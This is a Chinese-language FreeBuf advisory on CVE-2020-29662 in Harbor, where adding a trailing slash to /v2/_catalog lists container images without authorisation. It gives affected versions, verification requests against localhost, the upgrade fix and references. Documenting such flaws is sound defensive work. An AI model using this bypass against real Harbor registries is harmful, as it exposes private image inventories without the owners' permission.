官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
Harbor镜像列表未授权访问:CVE-2020-29662
- 关注
Harbor镜像列表未授权访问:CVE-2020-29662
概述
这里分享的是Harbor的一个中低危漏洞,镜像列表未授权访问
本身访问是需要授权的,但是直接访问/v2/_catalog和/v2/可以绕过
影响版本
Harbor < v2.1.2 或 Harbor< v2.0.5 版本
漏洞验证
访问
GET /v2/_catalog
目录,返回数据为空
http://localhost:80/v2/
访问
GET /v2/_catalog/
目录,得到镜像列表
http://localhost:80/v2/_catalog/
修复方案
升级至最新版
参考:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29662
https://github.com/goharbor/harbor/security/advisories/GHSA-38r5-34mr-mvm7
https://github.com/goharbor/harbor/releases/tag/v2.1.2
https://github.com/goharbor/harbor/releases/tag/v2.0.5
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者
文章目录